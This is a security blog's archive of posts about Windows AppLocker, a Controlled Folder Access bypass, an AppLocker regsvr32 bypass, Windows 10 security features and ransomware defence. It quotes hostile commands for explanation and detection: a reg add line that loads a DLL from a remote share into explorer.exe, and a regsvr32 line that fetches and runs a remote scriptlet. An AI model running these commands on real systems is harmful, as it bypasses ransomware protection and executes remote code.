Tag Archives: AppLocker

Security Researcher Demonstrates Bypass for Controlled Folder Access

In Windows 10 version 1709 (also known as the Fall Creator’s Update or Redstone 3) and later versions Microsoft introduced a feature known as Controlled Folder Access which aims to prevent ransomware (or unknown applications) from encrypting files within folders that you specify. Further details are provided here.

Last week at the DerbyCon security conference a security researcher, Soya Aoyama from Fujitsu System Integration Laboratories demonstrated how DLL injection (The technique of DLL injection is explained in more detail here and here.) could be used to add a DLL (defined) to the user interface (UI) of Windows 10 (in the form of the shell process, explorer.exe).

The Controlled Folder Access works by preventing any applications not present on a whitelist (a list of allowed applications) from modifying the files in the folders listed as requiring protected. Using the fact that explorer.exe is present on that allowed list; enabled the researcher to bypass this ransomware protection by adding the DLL as a context menu handler. This list of context handlers would usually allow you to for example; perform an anti-malware scan on a file by right clicking or to compress a file using 7-Zip. This list is stored in the Windows Registry at the following location:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers

In order to interact with a user explorer.exe by default it loads the shell.dll from the following location:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\InProcServer32

Aoyama changed the DLL value from shell.dll to his DLL in order that explorer.exe would load it when it started. He then terminated and restarted explorer.exe to successfully load his DLL.

Microsoft currently not in favour of patching this vulnerability
As per Microsoft’s 10 immutable laws of security; at this time they don’t intend to patch this vulnerability since it relies on an attacker having already compromising your system and using it to run a legitimate command to load a malicious DLL into explorer.exe:

reg add HKCU\Software\Classes\CLSlD\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\lnprocServer32 /f /ve /t REG SZ /d \\10.0.1.40\tmp\Anti-ControlledFolderAccess.dll

taskkill /1M explorer.exe /F

start explorer.exe

Due to this pre-requisite of compromising the system first; this issue won’t be patched. This bypass however does not require administrative (defined) access. Aoyama also demonstrated that Windows Defender did not detect this bypass; neither did other anti-malware solutions such as: Avast, ESET, Malwarebytes Premium or McAfee.

How can I protect myself from this bypass?
There are limited options available at this time to prevent this bypass from occurring. If an attacker can download the necessary DLL to your systems and load it; there is a possibility that your anti-malware solution may detect it since the DLL will likely have a low reputation (it would not be a commonly used file); but this is not guaranteed. This especially true since other anti-malware vendors did not detect it.

HitmanPro.Alert may detect this DLL on your system before it has been added to explorer.exe but would require you to have the premium version installed and monitoring your systems to do so.

The key to prevent the above from occurring would be to follow standard email and instant messaging best practices and lock your system (requiring a password or other form of authentication when you return to the system) when you are away from it to prevent someone entering commands. Keeping your system up to date will also reduce the risk of such a DLL from being downloaded if you were to click on a link in an email or instant message or via a drive by download.

If an attacker can physically access and type commands on your system; application white listing in the form of Windows AppLocker would not by default prevent (but even that feature can be bypassed) this attack since the command run by Aoyama makes use of legitimate Windows tools. If an attacker was to try to execute a script for the command (which is far more likely); AppLocker would block it if it is configured to block unknown scripts.

The DLL blocking feature of Windows AppLocker would also assist in this context but may introduce a performance penalty due to the level of effort it needs to undertake to carry out these checks.

Monitoring the location within the Window registry for changes using a tool such Autoruns is also a possibility but you would need to do this manually and given that ransomware doesn’t usually wait to encrypt your files is likely to be ineffective/too slow to detect this bypass.

Given the attention this bypass has received; anti-malware software may detect changes to the explorer.exe context handlers or the shell location going forward but again this is not guaranteed.

I am investigating another option and will update this post when I have more information available.

Thank you.

 

 

Malware can manipulate blinking hard drive LEDs to steal data from secured systems

In February this year, University of Israel security researchers released their findings of a new type of attack to steal data from secured systems. Secured systems are frequently air-gapped (defined) to mitigate attacks from the internet. To steal data, the attacker can deploy custom malware onto the target system which causes its hard drive activity LED lights to blink at very rapid intervals; to a human eye the lights may appear to stay on rather than switch on and off.

With this activity taking place, the light can stay turned on to represent the binary computer numbering system digit 1 and turn off to represent a 0 (zero). The researchers found blue LEDs gave the best results for their purposes. A recording of a video of this flickering light can represent entire files (smaller files are preferred). The malwares primary purpose is to steal encryption keys, user credentials (username and passwords) as well as logged keystrokes stored on the system. Video cameras suitable for this attack are airborne drones with cameras, CCTV cameras or existing cameras within cell phones.

This attack is particularly successful and innovative; but it does not pose as severe a risk as may initially appear. While an airborne drone could observe a secured system from outside the building, the system must be visible from the outside; many secured rooms/locations do not have externally visible windows.

In addition, for the data stealing to take place the attackers need to pre-compromise the system with custom malware to enable the LED activity lights to flash in a pre-defined ways to steal data. However of note, this attack does not require administrator rights on the secured system in order to be successful.

How can I protect myself from this threat?
If you administer secured systems (air-gapped or otherwise) you should ensure they are stored in locations not visible from outside of the building.

Other countermeasures include permanently disabling the LEDs activity lights or covering the lights, physically securing the USB ports of the system to prevent installation of malware or the use of application whitelisting e.g. AppLocker for Windows. Integrity verification of the contents of secured systems is also achievable by comparing hashes of those systems with known secure systems.

Thank you.

Windows AppLocker Bypass Disclosed

Update: 26th April 2016:
After some further research, this bypass can be blocked by denying regsvr32.exe and regsvr64.exe (depending on your systems architecture) from accessing the internet.

These files are usually present in the following directories (folders):

C:\Windows\System32 (32 bit systems only)
C:\Windows\SysWOW64 (64 bit systems only)

For 64 bit systems you should block any regsvr32.exe or regsvr64.exe that you find in both of the above folders.

You can use your installed firewall to do this or use the built-in Windows Firewall to create a rule to do this. Example steps to create rules for the Windows Firewall are located here and here. Please refer to the support website of the manufacturer of your firewall or it’s user guide if you are using a 3rd party firewall.

Alternatively, you can create a YARA rule to detect the presence of the following string within the memory of the conhost.exe process that is spawned on Windows 7 and later when a script is executed:

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

The part of the string we are interested in detecting would be the text after the /i switch.

More information about the conhost.exe process is available in this article.

This bypass does not make changes to the Windows registry but .sct files may be found in the Temporary Internet Files folder. Another well-known security researcher Alex Ionescu said that Device Guard (of Windows 10), fully enabled with script protection will block this bypass as well.

Further discussion and advice for this issue are available within this blog post.

I hope that this information is useful. My thanks to a colleague (you know who you a
re!) for his very useful insights on this topic.

Thank you.

=======================
Original Post:
=======================
Last week a security researcher made publically available proof of concept code that has the ability to bypass Windows AppLocker (application whitelisting).

I have written about this issue separately using Yammer but will provide more discussion below:

Why Should This Issue Be Considered Important?
According to this ThreatPost article the researcher initially responsibly disclosed (defined) this issue to Microsoft. However, it is uncertain if Microsoft will create a security update or mitigation to address this issue since AppLocker is functioning by design. In 2011 a bypass to AppLocker was discovered by Didier Stevens which was later addressed by Microsoft with a hotfix.

With a known bypass of AppLocker now being disclosed the effectiveness of AppLocker has been significantly reduced. I’m hoping that for this new bypass a similar solution can be found. I’m a particular fan of AppLocker since it provides a strong defence against zero-day malware (defined) and ransomware (defined). It is also relatively easy to configure. An introductory post to configuring AppLocker would be this Malwarebytes blog post.

Since it runs with kernel level privileges (defined) it isn’t easy for an attacker to shut it down and can be configured to block code that is run by an administrator (defined) (unless that code is already whitelisted). The enhancements it received in Windows 10 e.g. blocking a script from being manually entered at the command prompt is a good example of defence in-depth (defined)(PDF) security.

How Can I Protect Myself From This Issue?
As mentioned above, at this time there is no known workaround for this bypass. While blocking Regsvr32.exe using AppLocker may seem like an obvious solution, this is a legitimate application that is often used by Windows especially during program installation and updates. Denying this application from running would likely lead to unexpected behavior.

I’ll monitor this issue and post here should further information become available. Thank you.

Windows 10 Will Offer Increased Security (updated)

On the 29th of July 2015, the next version of Windows from Microsoft, Windows 10 will become available to the general public (with Windows 10 Enterprise for corporate customers becoming available in the Fall of 2015). Windows 10 will offer new features such as DirectX 12, virtual desktops and an improved Start menu among others. However I wish to focus on the security improvements that we can look forward to seeing in the upcoming release:

Microsoft Edge
As mentioned in my post discussing the bug bounty for Microsoft Edge (Microsoft’s new browser), it will feature security changes such as the removal of now obsolete technologies such as VBScript, ActiceX, toolbars, Browser Helper Objects (BHOs) and VML which will mean that less code is present to attack. The less code there is, the less scope there is to exploit it (i.e. its attack surface has been reduced).

Microsoft Edge will offer more convenient and more secure ways (Windows Hello and Microsoft Passport) to authenticate to websites (assuming that popular websites adopt this new approach of authentication). I’m really excited about these features since it will mean fewer passwords to manage and also means that if the website is hacked, your password hash can’t be stolen since the website doesn’t store a password hash. Updating high risk and/or frequently passwords is a chore and these new authentication methods will mean this chore will slowly begin to be a thing of the past.

In addition, for the first time Edge will offer support for both Content Security Policy (CSP) (appears to be CSP Level 1 i.e. v1.0 rather than Level 2 i.e. v2.0) and HTTP Strict Transport Security (HSTS).

What is Content Security Policy (CSP)?
Content Security Policy (CSP) is a W3C standard that allows a website owner to specify the sources of trusted content used to build/display a page e.g. scripts (JavaScript), embedded videos (CSP Level 2 only), audio, fonts, forms (CSP Level 2 only) and plugins (CSP Level 2 only) as well as other object types. Since this content can only load from a website address that you specify (since inline JavaScript is ignored), if the websites’ content has been altered and additional content inserted by an attacker (usually JavaScript), it won’t be able to load since the content will come from a source that you have not approved (not whitelisted). This helps to protect against cross-site scripting (XSS) attacks.

The differences between CSP Levels 1 and 2 are detailed in this W3C document. Unfortunately not many websites at this time use CSP to protect their users. Twitter, Facebook and Google Gmail are known to being CSP. Smaller sites such as SendSafely also make use of it.

What is HTTP Strict Transport Security (HSTS)?
HSTS allows your web browser (e.g. Mozilla Firefox, Google Chrome etc.) to only access a web site using a secure connection (HTTPS, which will display a padlock in your browser address bar) and to never attempt to access that website using an unsecured connection namely HTTP. One of the other benefits of HSTS (a more comprehensive list is available in the paragraph titled “Threats” within this page) is that HSTS does not allow a user to override an invalid certificate message (otherwise known as a HTTPS click through). Thus if there is an issue with the certificate being used to verify the identity of the website, you can’t click “Continue anyway” (whether there is genuinely a malicious issue with the site or its certificate has simply expired) and thus any risk is eliminated. An example of a pop up window showing such a click through message is shown in the section “Why click-throughs are so dangerous” within this Microsoft MSDN blog post.

Support for HSTS was added to Internet Explorer 11 for Windows 8.1 and Windows 7 by Microsoft when the June 2015 security update is installed. Further information is available in this blog post and this knowledge base article.

Why are these 2 security features noteworthy? As more legitimate websites become to be hacked and extra content added to them, having CSP should stop those attackers compromising your device when accessing the now hacked site. In addition, when something is wrong with the certificate used to verify a websites identity its best not to conduct sensitive transactions with it during that time, while the certificate may simply be expired, there may also be a malicious reason why you are seeing that message and this is where HSTS can protect you.

Other Security Enhancements of Microsoft Edge
Microsoft Edge will also include a Memory Garbage Collector (MemGC) to defend it against Use-After-Free security flaws (where the browser marks memory that it has finished using as free but then tries to use it again (either unintentionally via a software bug resulting from human error or maliciously via a piece of malware). I previously mentioned these flaws in this blog post where a group of security researchers were rewarded due to providing additional defences against them. This is excellent news since these flaws are now very popular with malware authors.

The final noteworthy mitigation is Control Flow Guard (CFG) which seeks to prevent an attacker obtaining control of the browser by manipulating the program counter of your CPU (Central Processing Unit). The program counter is a register within your CPU which always holds the memory location of the next instruction to be executed. I previously discussed how this mitigation has been bypassed before but the attacker’s code would need to know how to bypass this mitigation and thus this defensive measure still has value.

The decision that Microsoft Edge should always be a 64 bit program running on your computing device (as opposed to a 32 bit program) is significant since the mitigation known as ASLR (Address Space Layout Randomization) becomes far more effective with a 64 bit process. When used with a 64 bit process, it’s known as High Entropy (HE) (i.e. highly random) ASLR. HEASLR is discussed in more detail in this post and this post. It’s advantages include making heap spraying techniques far less effective. Further information on HEASLR can be found on Alex Ionescu’s blog.

I very much approve of this choice to make Edge 64 bit by default since I was very surprised to learn just how many users still use Internet Explorer 32 bit on a 64 bit version of Windows. This forum thread shows how many users were affected by an issue that only occurred if they were using a 32 bit version of Internet Explorer. While a 64 bit version of Internet Explorer has been available since the release of Windows Vista in January 2007, 32 bit versions are still very widely used. I’ve done some quick checks and can confirm that opening Internet Explorer 8 on a newly installed Windows 7 64 bit system will by default launch a 32 bit version (unless Enhanced Protected Mode (EPM) is enabled (which was only introduced to Windows 7 with Internet Explorer 10)). A newly installed Windows 8.1 64 bit system also showed the same behaviour (opening a 32 bit version of Internet Explorer 11). Only the Modern UI (Windows Store) app otherwise known as the Immersive Internet Explorer of Windows 8.1 was a 64 bit process.

While Microsoft mentions that Edge is 64 bit only when running on a 64 bit processor, for 32 bit versions of Windows 10 as expected it remains a 32 bit browser. Please find below screenshots from Sysinternals Process Explorer showing Microsoft Edge on Windows 10 32 bit and Windows 10 64 bit:

Edge 32 bit:
Edge_32bit

Edge 64 bit:
Edge_64bit

Please note the CPU architecture of the Edge process is not shown in the Windows 10 32 bit screenshot (this option is not available on a 32 bit system since only 32 bit programs can run). However the type of process can be confirmed from looking at the VirusTotal results for Spartan.exe. The Intel 386 architecture mentioned is 32 bit:

VirusTotal_Edge_32bit

An older blog post discussed a 64 bit version of Internet Explorer and detailing why it was not at the time made the default version. EPM is explained in more detail here and here. 64 bit versions of Internet Explorer are more secure since:

  • They have EPM enabled
  • All 64 bit processes (not just Internet Explorer) have Data Execution Prevention (DEP) enabled all the time since it’s not optional for 64 bit processes
  • All 64 bit processes (not just Internet Explorer) can (if they choose to/opt-in) use HEASLR (making heap spray attacks less effective, as mentioned above)
  • Are more resistant to shellcode exploits since the shellcode must be 64 bit and not 32 bit. 64 bit shellcode is less common.
  • Only 64 bit DLLs can be loaded into a 64 bit version of Internet Explorer. This can increase stability since fewer (if any) add-ons will be loaded when Internet Explorer starts and this helps to reduce the attack surface (since those add-ons aren’t loaded they can’t be targeted). EPM further reduces the likelihood that a 64 bit DLL will be loaded since add-ons not compatible with EPM are not loaded.
  • In addition Google mentioned the advantages they saw when they made 64 bit versions of Chrome available (the speed advantage mentioned may or may not apply to Internet Explorer in this case).

Windows Device Guard
This security feature is an evolution of Windows AppLocker (a feature which I mentioned is useful for protecting against ransomware in a corporate environment) that checks that an app is trusted before allowing it to run (be used) on your computing device. Device Guard is intended for devices used within mission critical settings such as a hospital, a factory assembly line, a power plant, an air traffic control tower, a PoS (Point of Sale terminal e.g. a cash register) terminal or an ATM.

Device Guard checks that the app is signed (verified as trustworthy) from one of the following sources:

  • By a known and trusted software vendor
  • From the Windows Store (Microsoft’s online app store)
  • Your company (if the original software vendor did not sign it) for line of business applications that you use

This new feature is particularly effective against APTs (Advanced Persistent Threats) since in a similar manner to AppLocker an APT would not be trusted and would not be allowed to run. This is so effective since Device Guard (again similar to AppLocker) does not rely on receiving updates to detect known threats in the same way that anti-malware software does. It works simply by determining if you have allowed this program, if not it will block it.

What Advantages Does Device Guard Have Over AppLocker (or other whitelisting solutions)?
Even if a system has been fully compromised (where the attacker has already obtained administrative access), Device Guard can block malware by using hardware virtualization to isolate the decision to block/allow from Windows even if the Windows kernel is fully compromised. This isolated mode which makes use of the Local Security Authority (LSA) to protect against Pass the Hash (PtH) attacks.

However Device Guard will not be able to protect against apps that use Just-In-Time (JIT) code compilation such as Java, .Net or macros embedded in Microsoft Office documents but using existing anti-malware software and having a Windows device user use a standard user account rather than an administrative account will provide the necessary protection.

Finally, Device Guard should be easier to administer/maintain since AppLocker requires that unsigned executable (runnable) files (that you trust) be approved by whitelisting their file hash. Since Device Guard relies solely on an application being signed, this extra task will be eliminated. The only flaw that I can see with Device Guard is that it may be open to attacks on digital signatures whereby a signing certificate can be stolen and used to sign malware, noteworthy examples involving Adobe, Microsoft, Opera and Realtek/JMicron have taken place.

It’s not clear how prevalent the use of Device Guard will be in a corporate environment (it won’t be present in consumer versions since according to this post Device Guard is available for Windows 10 Enterprise edition only). Most existing Windows 8 devices will support the use of Device Guard; provided they are recent enough to have UEFI firmware and their CPUs support AMD-Vi or Intel VT-d. The full requirements of Device Guard are listed here.

Update: 5th July 2015:
Windows 10 Additional Security Features: PowerShell Script Logging Capabilities
In addition to the improvements discussed above, Windows 10 will offer additional security for PowerShell scripts that are executed (allowed to run) on a Windows 10 system (and on Windows 8.1/Server 2012 R2 systems with update kb3000850 installed).

If a Windows 10 system is compromised it will offer much more detailed logging that can be used to determine how much the system was compromised and what changes were made. Moreover, even if obfuscated (garbled scripts (used to make detection of such scripts more difficult) that must be un-garbled before being allowed to run) are used by the attacker, such scripts must eventually be deciphered in order for the system to carry out the malicious commands, thus Windows 10 will be able to show you what these obfuscated have done to your system, this was not previously possible. The above improvements will allow incident responders to determine what data was compromised (if such scripts were used to steal data) and what remediation’s to take to revert the system back to a secure state.

Furthermore there are occasions when the logging of such PowerShell scripts may also inadvertently capture sensitive information. Windows 10 provides the capability for applications to encrypt their sensitive information before it is added to the logs. This encryption can later be removed while reviewing the logs to ensure that crucial data is still legible.

The above capabilities are discussed in more detail in this Microsoft SRD blog post.

One additional capability that PowerShell will feature will be to address a previous limitation of using Windows AppLocker in Allow Mode (namely that only recognised/trusted applications are allowed to run also known as application whitelisting). This limitation was that while any unrecognized/unauthorized PowerShell script (within a file) would be blocked by AppLocker, if such a script was entered manually (e.g. using the keyboard) within a PowerShell prompt (similar to a terminal window), this interactively created script would run. The Constrained PowerShell feature of PowerShell v5 available with Windows 10 will block this interactive means of running a PowerShell when AppLocker is enabled in the more restrictive Allow mode that will address this previous weakness. Further information on this feature is available in this Microsoft PowerShell blog post.

A new feature debuting in Windows 10 will be the Antimalware Scan Interface (AMSI) which can be integrated with an anti-malware application to allow the evaluation of any script (PowerShell, VBScript among others) once that script has been de-obfuscated and is ready to carry out its intended purpose. This will also protect against code/scripts that only ever exist in memory (are never written to disk within a file). Windows 10 will automatically benefit from this feature since its scripting engines will use the AMSI feature by default. This feature can also be used by application developers (when that application wishes to use scripts for automation purposes) as well as 3rd party anti-malware vendors.

It’s amazing to see these capabilities being added to thwart more advanced means of compromising systems that make use of in-memory scripts that are obfuscated to avoid detection by standard anti-malware signatures. The addition of the Constrained PowerShell feature also addresses a key weakness in previous implementations of this robust application white-listing feature.

In conclusion, Windows 10 will bring a range of technologies that will help to ensure our device’s remain secure even as advanced persistent threats (APTs) and insider threats become more commonplace. If you have any questions about this blog post or any of my other posts, please feel free to contact me.

Thank you.

===========================
Please find below further references for Content Security Policy (CSP), HTTP Strict Transport Security (HSTS) and Data Execution Prevention (DEP) which were discussed above:

References:
Content Security Policy (CSP):
An Introduction to Content Security Policy
Content Security Policy (CSP)
Reject the Unexpected – Content Security Policy in Gmail
Content Security Policy
Time to Review/Implement Content Security Policy v1.0
Improving Browser Security with CSP

HTTP Strict Transport Security (HSTS):
HTTP Strict Transport Security comes to Internet Explorer
HTTP Strict Transport Security (Mozilla)
HTTP Strict Transport Security (OWASP)
HTTP Strict Transport Security (Entrust)
How to enable HTTP Strict Transport Security (HSTS) in IIS7+
Firefox joins Chrome in supporting HTTP Strict Transport Security (HSTS)

Data Execution Prevention (DEP):
Understanding DEP as a mitigation technology part 1
Understanding DEP as a mitigation technology part 2

Defending Against Ransomware

What is Ransomware?

Ransomware is malware that stops you using your computer in some way. This can be either by showing a lock out screen (not allowing you to login) or by encrypting your personal data. For each of these possibilities a ransom is demanded in order to use your computer or recover your (now) lost data.

Ransomware has been around for many years becoming most prevalent from late 2011 onwards with Reveton being one of the most well-known variants from approximately 3 years ago. Despite this category of malware being several years old, newer variants such as CryptoLocker, TeslaCrypt and most recently Los Pollos Hermanos continue to cause disruption, stress and cause financial loss to their victims. Further information on ransomware is provided in this blog post and explained further in this podcast.

Should you pay the ransom?

Since paying the ransom convinces the malware authors that their scheme is working and funds a black market economy, you should not pay the ransom. I realize that if the ransomware has encrypted irreplaceable data that is not backed up you may have no choice to pay it, but there is no guarantee that you will get your data back. The human impact of ransomware is detailed in this analysis by FireEye. One possible outcome is that the ransom is paid but the files cannot be decrypted.

How To Remove an Existing Ransomware Infection?

If you have an existing ransomware infection I would suggest following the advice from this short Sophos blog post. That blog post also references an explanatory YouTube video. The Sophos Bootable Antivirus CD mentioned in the above blog post can be created using the steps in this knowledge base article.

An alternative approach is detailed by Mark Russinovich of Microsoft in this blog post (see the section titled “The Hunt”). He provides further easy to follow steps to remove the malware should scans with Microsoft Security Essentials or Windows Defender Offline fail.

If the above advice is not successful in removing the ransomware infection, please consider using one of the 3rd malware removal services mentioned in this Symantec forum post. Please note this forum post does not list services that Symantec wishes to promote or advertise, these services are provided by trusted and highly successful 3rd parties independent of Symantec.

Preventing A Ransomware Infection:

In order to prevent a ransomware infection I would recommend the following steps:

  1. Keep your operating system and web browser up to date. I detail how within this page.
  2. Install and use anti-malware software (ensure that it offers real time protection (continuous monitoring)).
  3. Don’t open attachments from an untrusted source or attachments you weren’t expecting from someone you do trust (their email account could have been hijacked).
  4. Backup up your data regularly. At least one such backup should not be connected to your computer (if it’s connected at the time the malware infects your computer, your backup could also be encrypted). In addition, test that you can restore any data that you wish from your backup before such a malware infection occurs.
  5. Further advice is also provided by FireEye in the blog post that I mentioned above (please see the final section titled “Individuals and Small Businesses Should Consider Basic Steps to Protect Themselves”).
  • Note: Please ensure that if you use cloud storage e.g. Google Drive, Dropbox etc. to not have the cloud drive accessible (in the same way as a standard folder) on your computer when you are not actively using it. If you get a ransomware infection it could also encrypt the backup cloud drive (since it works just like another folder on your computer) and this makes restoring your data more difficult.

Update: 29th May 2015:
If you are using an edition of Windows (compatible editions listed here) that incorporates AppLocker (for Windows 8.0 and later only corporate versions of Windows incorporate AppLocker), please enable it to Enforce executable rules to prevent ransomware and other malware from running on your PC.

Update: 10th November 2015:
This detailed post from Susan Bradley provides easy to understand further advice on defending against ransomware.

Update: 10th January 2016:
In addition to the information/advice in this blog post; a more recent blog post also discusses a new type of ransomware threat and how to protect yourself against it.

Update: 31st January 2016:
This Computerworld article provides further defensive tips e.g. restricting mapped network drives and knowing the users of your devices.

Since AppLocker is another name for application white listing only executable files that you pre-approve (i.e. files that run code, usually applications) will be allowed to run. AppLocker can also prevent unauthorized Windows Installer files (*.msi and *.msp) and scripts e.g. PowerShell and batch files (among others, more details provided here) from running without prior approval. Further resources for configuring AppLocker are provided in this article and this series of articles.

Update: 6th March 2016:
For advice on preventing a ransomware attack from affecting your business, please see this more recent blog post. This post also provides a resource to defend against the “Locky” variant of ransomware and provides an excellent explanation of your options/what to do when ransomware has already infected your computing device (complimenting the existing information in this post) and how to defend against the Locky variant of ransomware being spread via spam messages.

Update: 17th March 2016:
In February 2016 very large numbers of websites powered by WordPress (a blogging tool/content management system) were compromised and used to spread ransomware to those who visited the websites. This threat and recommendations to remove/prevent it are also available in a previous blog post.

In early March 2016, Apple Mac OS X systems that had the Transmission BitTorrent client version 2.90 installed were at risk from a ransomware infection. Further discussion and recommendations are provided in a more recent blog post.

Update: 26th March 2016:
This more recent blog post provides further advice on preventing ransomware (not previously documented within this blog). Please review it to further defend yourself against this increasingly prevalent threat.

Thank you.